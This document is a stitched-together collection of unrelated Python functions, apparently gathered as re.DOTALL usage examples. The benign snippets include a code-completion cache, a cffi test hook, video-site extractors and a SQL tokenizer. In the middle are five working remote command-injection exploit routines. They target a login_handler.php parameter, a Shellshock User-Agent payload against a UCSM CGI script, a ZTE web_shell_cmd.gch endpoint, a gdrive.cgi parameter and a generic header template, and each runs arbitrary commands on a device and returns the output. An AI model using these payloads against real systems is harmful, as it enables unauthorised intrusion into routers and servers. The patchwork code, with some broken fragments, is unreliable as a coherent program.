def cache_call_signatures(evaluator, bracket_leaf, code_lines, user_pos):
    """This function calculates the cache key.

    Generator protocol: first yields the cache key (or ``None`` when the
    result must not be cached), then yields the value to cache — the
    definitions of the leaf just before the opening bracket.
    NOTE(review): depends on jedi-style tree/evaluator objects
    (``get_parent_until``, ``get_previous_leaf``) not visible here.
    """
    # 0-based index of the cursor's line within code_lines.
    index = user_pos[0] - 1
    # Source text from the line the bracket starts on up to the cursor.
    before_cursor = code_lines[index][:user_pos[1]]
    other_lines = code_lines[bracket_leaf.start_pos[0]:index]
    whole = '\n'.join(other_lines + [before_cursor])
    # Everything up to (and including) the last '(' before the cursor;
    # DOTALL lets '.' span the joined newlines.
    before_bracket = re.match(r'.*\(', whole, re.DOTALL)
    module_path = bracket_leaf.get_parent_until().path
    if module_path is None:
        yield None  # Don't cache!
    else:
        # NOTE(review): before_bracket is a Match object; Match objects
        # compare by identity, so as a key component it only hits the
        # cache when the exact same object recurs — confirm intended.
        yield (module_path, before_bracket, bracket_leaf.start_pos)
    yield evaluate_goto_definition(
        evaluator,
        bracket_leaf.get_previous_leaf()
    )
# Python re.DOTALL usage examples (translated section header)
def execute(self, cmd):
    """Run *cmd* via the login_handler.php command injection and return its output."""
    token = random_text(32)
    target_url = "{}:{}/login_handler.php".format(self.target, self.port)
    post_headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
    payload = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, token)

    response = http_request(method="POST", url=target_url, headers=post_headers, data=payload)
    if response is None or token not in response.text:
        return ""

    # Capture everything up to the echoed marker token.
    matches = re.findall("(|.+?){}".format(token), response.text, re.DOTALL)
    return matches[0] if matches else ""
def execute(self, cmd):
    """Run *cmd* through the Shellshock User-Agent injection and return the text between markers."""
    token = random_text(32)
    cgi_url = "{}:{}/ucsm/isSamInstalled.cgi".format(self.target, self.port)
    shellshock_headers = {
        "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (token, cmd, token)
    }

    response = http_request(method="GET", url=cgi_url, headers=shellshock_headers)
    if response is None or token not in response.text:
        return ""

    # Command output is echoed between the two marker tokens.
    found = re.findall("%s(|.+?)%s" % (token, token), response.text, re.DOTALL)
    return found[0] if found else ""
def execute(self, cmd):
    """Inject *cmd* via the configured header template and return the marked output."""
    token = random_text(32)
    full_url = "{}:{}{}".format(self.target, self.port, self.path)
    payload = self.valid.replace("{{marker}}", token).replace("{{cmd}}", cmd)

    response = http_request(method=self.method, url=full_url, headers={self.header: payload})
    if response is None:
        # NOTE: deliberately returns None here (the no-match path below returns "").
        return

    found = re.findall("{}(.+?){}".format(token, token), response.text, re.DOTALL)
    return found[0] if found else ""
def execute(self, cmd):
    """Run *cmd* through the web_shell_cmd.gch endpoint and return its output."""
    shell_url = "{}:{}/web_shell_cmd.gch".format(self.target, self.port)
    form_headers = {u'Content-Type': u'multipart/form-data'}
    form_data = {
        'IF_ACTION': 'apply',
        'IF_ERRORSTR': 'SUCC',
        'IF_ERRORPARAM': 'SUCC',
        'IF_ERRORTYPE': '-1',
        'Cmd': cmd,
        'CmdAck': '',
    }

    response = http_request(method="POST", url=shell_url, headers=form_headers, data=form_data)
    if response is None or response.status_code != 200:
        return ""

    # The command output is returned inside the Frm_CmdAck textarea.
    found = re.findall(
        '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>',
        response.text, re.DOTALL)
    return found[0] if found else ""
def execute(self, cmd):
    """Run *cmd* via the gdrive.cgi f_gaccount injection and return its output."""
    token = random_text(32)
    cgi_url = "{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo {};".format(self.target, self.port, cmd, token)

    response = http_request(method="GET", url=cgi_url)
    if response is None or token not in response.text:
        return ""

    # Capture everything up to the echoed marker token.
    found = re.findall("(|.+?){}".format(token), response.text, re.DOTALL)
    return found[0] if found else ""
def setup_module():
    """Install a checking wrapper around cffi's Verifier._write_source.

    Clears the cffi temp dir, then monkey-patches
    ``cffi.verifier.Verifier._write_source`` so every generated C file is
    re-read and scanned (outside comments and string literals) for '$'
    characters, which GCC accepts in identifiers but are non-standard.
    """
    import cffi.verifier
    cffi.verifier.cleanup_tmpdir()
    #
    # check that no $ sign is produced in the C file; it used to be the
    # case that anonymous enums would produce '$enum_$1', which was
    # used as part of a function name. GCC accepts such names, but it's
    # apparently non-standard.
    # C /* */ and // comments: DOTALL lets block comments span lines,
    # MULTILINE makes $ stop // comments at each line end.
    _r_comment = re.compile(r"/\*.*?\*/|//.*?$", re.DOTALL | re.MULTILINE)
    # Double-quoted C string literals (non-greedy, single line).
    _r_string = re.compile(r'\".*?\"')
    def _write_source_and_check(self, file=None):
        # Delegate to the real writer, then re-read what it wrote and
        # assert no '$' survives once comments/strings are blanked out.
        base_write_source(self, file)
        if file is None:
            f = open(self.sourcefilename)
            data = f.read()
            f.close()
            data = _r_comment.sub(' ', data)
            data = _r_string.sub('"skipped"', data)
            assert '$' not in data
    base_write_source = cffi.verifier.Verifier._write_source
    cffi.verifier.Verifier._write_source = _write_source_and_check
def add_head(text):
    """Prepend the template's head HTML (with rewritten asset paths) to *text*."""
    template = open(PATH_TO_TEMPLATE_HTML).read()
    # Rewrite template-relative URLs so they resolve from the output
    # location; order matches the original sequential replacements.
    replacements = [
        ('{{ url_index }}', PATH_TO_HTML + '/' + 'index.html'),
        ('href="img/', 'href="' + PATH_TO_TEMPLATE + '/img/'),
        ('="lib/', '="' + PATH_TO_TEMPLATE + '/lib/'),
        ('="css/', '="' + PATH_TO_TEMPLATE + '/css/'),
        ('="js/', '="' + PATH_TO_TEMPLATE + '/js/'),
    ]
    for old, new in replacements:
        template = template.replace(old, new)
    # remove demo content
    template = re.sub(r'<!-- start of demo -->.*<!-- end of demo -->',
                      r'', template, flags=re.M | re.DOTALL)
    return template + text
#head_new = ''
# for l in head.split('\n'):
# if l.find('href="http://') > -1 or l.find('src="http://') > -1 or l.find('href="#') > -1:
# head_new += l
# else:
# l = l.replace('href=', 'href="' + PATH_TO_TEMPLATE + '"')
# l = l.replace('src=', 'src="' + PATH_TO_TEMPLATE + '"')
# head_new += l
# return head + text
def _real_extract(self, url):
    """Extract id, title, description and audio URL from the sample page."""
    music_id = re.match(self._VALID_URL, url).group('id')
    webpage = self._download_webpage(url, music_id)

    # Title sits inside the sample header block; DOTALL lets the match
    # cross line breaks in the markup.
    title = self._html_search_regex(
        r'<div id="single_sample_header">.*?<a href="#">(.+?)</a>',
        webpage, 'music title', flags=re.DOTALL)
    description = self._html_search_regex(
        r'<div id="sound_description">(.*?)</div>', webpage, 'description',
        fatal=False, flags=re.DOTALL)

    return {
        'id': music_id,
        'title': title,
        'url': self._og_search_property('audio', webpage, 'music url'),
        'uploader': self._og_search_property('audio:artist', webpage, 'music uploader'),
        'description': description,
    }
def _title_and_entries(self, list_id, base_url):
    """Yield the list title first, then a url_result for every clip on every page."""
    pagenum = 1
    while True:
        page_url = self._page_url(base_url, pagenum)
        webpage = self._download_webpage(
            page_url, list_id,
            'Downloading page %s' % pagenum)

        # The password gate and the list title only appear on page 1.
        if pagenum == 1:
            webpage = self._login_list_password(page_url, list_id, webpage)
            yield self._extract_list_title(webpage)

        for video_id in re.findall(r'id="clip_(\d+?)"', webpage):
            yield self.url_result('https://vimeo.com/%s' % video_id, 'Vimeo')

        # Stop when the "more pages" marker disappears.
        if re.search(self._MORE_PAGES_INDICATOR, webpage, re.DOTALL) is None:
            break
        pagenum += 1
def find_links(file):
    """Find all markdown links in a file object.
    Yield (lineno, regexmatch) tuples.
    """
    seen = set()  # don't yield the same link text twice
    # Pair each line with the next one so two-line links are caught too;
    # one-line links match inside the second element of the pair, which
    # is why 1-based numbering starts at 2.
    firsts, seconds = itertools.tee(file)
    next(seconds)  # first line is never second line
    for lineno, (first, second) in enumerate(zip(firsts, seconds), start=2):
        combined = first + second
        for match in re.finditer(_LINK_REGEX, combined, flags=re.DOTALL):
            text = match.group(0)
            if text not in seen:
                seen.add(text)
                yield match, lineno
def writeJson(self, inner_path, data):
    """Serialize *data* as pretty-printed JSON and write it to *inner_path*."""
    content = json.dumps(data, indent=1, sort_keys=True)

    # Collapse short single-item lists and dicts onto one line to make
    # the output a little more compact.
    content = re.sub(
        "\[([^,\{\[]{10,100}?)\]",
        lambda match: "[ " + match.group(1).strip() + " ]",
        content, flags=re.DOTALL)
    content = re.sub(
        "\{([^,\[\{]{10,100}?)\}",
        lambda match: "{ " + match.group(1).strip() + " }",
        content, flags=re.DOTALL)

    # Write to disk
    self.write(inner_path, content)
# Get file size
def getOfflineMediaList(self, folderName=False, title=False, contentType=7):
    # Build media packages for each '{...}"spaces":' entry in a listing.
    # NOTE(review): `entryS`, `folderFanart` and `folderIcon` are not
    # defined in this function nor visible in this file — presumably
    # module/instance state elsewhere; confirm before relying on this.
    # NOTE(review): the `title` parameter is accepted but never used here.
    mediaFiles = []
    # DOTALL so an entry's JSON-ish body may span multiple lines.
    for r1 in re.finditer('\{(.*?)\"spaces\"\:' , entryS, re.DOTALL):
        entry = r1.group(1)
        media = self.getMediaPackage(entry, folderName=folderName, contentType=contentType, fanart=folderFanart, icon=folderIcon)
        if media is not None:
            mediaFiles.append(media)
    return mediaFiles
##
# retrieve a list of videos, using playback type stream
# parameters: prompt for video quality (optional), cache type (optional)
# returns: list of videos
##
def transform_template(self, obj):
    """Expand a ``#lst:`` labeled-section transclusion template.

    Raises NotInterested for any other template name.
    """
    if not obj["name"].startswith("#lst:"):
        raise NotInterested()

    article_name = remove_prefix(obj["name"], "#lst:")
    article = self.api.get_content(article_name)
    section_name = obj["params"]["1"]

    # Match <section begin="name"/> ... <section end="name"/> markers.
    quoted = re.escape(section_name)
    begin = r"\<section\s+begin\=[\"']?" + quoted + r"[\"']?\s*\/>"
    end = r"\<section\s+end\=[\"']?" + quoted + r"[\"']?\s*\/\>"
    section = re.search(begin + "(.*)" + end, article, re.DOTALL)

    if not section:
        message = "section '{}' of '{}' cannot be included" \
            .format(section_name, article_name)
        return {"type": "error", "message": message}

    content = parse_content(self.api, self.title, section.group(1).strip())
    return {"type": "included_section", "content": content}
def contentMalicious(self, content, goodregex, badregex):
    """Classify *content* against lists of bad and good regex patterns.

    Bad indicators win: returns True if any pattern in *badregex*
    matches, otherwise False if any pattern in *goodregex* matches,
    otherwise None (unknown).  Matching is case-insensitive and '.'
    spans newlines (IGNORECASE | DOTALL), anchored at the start of
    *content* via re.match.
    """
    # First, check for the bad indicators (iterating an empty list is a
    # no-op, so the old `len(...) > 0` guards were redundant).
    for rx in badregex:
        if re.match(rx, content, re.IGNORECASE | re.DOTALL):
            self.sf.debug("Found to be bad against bad regex: " + rx)
            return True

    # Then check for good indicators.
    for rx in goodregex:
        if re.match(rx, content, re.IGNORECASE | re.DOTALL):
            # fixed typo in log message: "againt" -> "against"
            self.sf.debug("Found to be good against good regex: " + rx)
            return False

    # If nothing was matched, reply None
    self.sf.debug("Neither good nor bad, unknown.")
    return None
# Look up 'query' type sources
def get_action_dirlist(driverpath):
    """ Get the list of action directories

    Reads the driver file at *driverpath* and extracts the
    comma-separated entries of its ``package_list = [...]`` assignment.
    Returns [] when the file does not exist, contains no package_list,
    or reading fails.  (Converted from Python 2 `print`/`except` syntax
    to Python 3, matching the sibling implementation in this file.)
    """
    actions_package_list = []
    try:
        if os.path.isfile(driverpath):
            with open(driverpath, 'r') as fobj:
                drv_text = fobj.read()
            # package_list may span lines (DOTALL); the greedy .* runs
            # to the last ']' in the file, as in the original.
            search_string = re.compile('package_list.*=.*\]',
                                       re.DOTALL | re.MULTILINE)
            match = re.search(search_string, drv_text)
            if match:
                match_string = match.group()
                # extracting the text within [] and get the list of packages separated by ,
                actions_package_list = re.findall(r'\[(.*)\]', match_string)[0].split(',')
                print("\n actions package list: ", actions_package_list)
        else:
            print("file {0} does not exist".format(driverpath))
    except Exception as e:
        print(str(e))
    return actions_package_list
def get_action_dirlist(driverpath):
    """ Get the list of action directories """
    actions_package_list = []
    try:
        if not os.path.isfile(driverpath):
            print("file {0} does not exist".format(driverpath))
            return actions_package_list

        with open(driverpath, 'r') as fobj:
            lines_as_string = ''.join(fobj.readlines())

        # package_list may span lines; greedy .* runs to the last ']'.
        pattern = re.compile(r'package_list.*=.*\]', re.DOTALL | re.MULTILINE)
        match = re.search(pattern, lines_as_string)
        if match:
            # Keep the text between the first '[' and the next ']'.
            bracketed = match.group().split('[')[1].split(']')[0]
            actions_package_list = bracketed.split(',')
        return actions_package_list
    except Exception as exception:
        print_exception(exception)
        return actions_package_list
def get_history(self, addr):
    """Return the history of *addr* as height/tx_hash dicts, sorted by
    height then hash, with duplicates removed.

    NOTE(review): Python 2 only — ``str.encode('hex')`` was removed in
    Python 3 (binascii.hexlify / bytes.hex replace it), and the final
    ``map`` relies on py2 returning a list.
    """
    out = []
    # Unspent outputs contribute (height, tx_hash) pairs directly.
    o = self.listunspent(addr)
    for item in o:
        out.append((item['height'], item['tx_hash']))
    # Stored history is a string of fixed-width 80-byte records; DOTALL
    # lets '.' also match newline bytes inside the records.
    h = self.db_hist.get(addr)
    if h:
        for item in re.findall('.{80}', h, flags=re.DOTALL):
            # Record layout (per the slices below): bytes 0:32 and
            # 40:72 are presumably tx hashes, 36:40 and 76:80 heights
            # — TODO confirm against the writer of db_hist.
            txi = item[0:32].encode('hex')
            hi = hex_to_int(item[36:40])
            txo = item[40:72].encode('hex')
            ho = hex_to_int(item[76:80])
            out.append((hi, txi))
            out.append((ho, txo))
    # uniqueness
    out = set(out)
    # sort by height then tx_hash
    out = sorted(out)
    return map(lambda x: {'height': x[0], 'tx_hash': x[1]}, out)
def scanner(cls):
    """Lazily build and return the class-level re.Scanner for SQL-ish tokens."""
    if not getattr(cls, '_scanner', None):
        def tokenize(token_type):
            # Build a callback wrapping the matched text in a Token.
            return lambda sc, tk: cls.Token(token_type, tk)

        # MULTILINE so '$' ends line comments at each newline; DOTALL so
        # '.' inside block comments/strings can span lines.
        cls._scanner = re.Scanner([
            (r"(--|//).*?$", tokenize(cls.LINE_COMMENT)),
            (r"\/\*.+?\*\/", tokenize(cls.BLOCK_COMMENT)),
            (r'"(?:[^"\\]|\\.)*"', tokenize(cls.STRING)),
            (r"'(?:[^'\\]|\\.)*'", tokenize(cls.STRING)),
            (r"\$\$(?:[^\$\\]|\\.)*\$\$", tokenize(cls.STRING)),
            (r";", tokenize(cls.SEMICOLON)),
            (r"\s+", tokenize(cls.WHITESPACE)),
            (r".", tokenize(cls.OTHER)),
        ], re.MULTILINE | re.DOTALL)
    return cls._scanner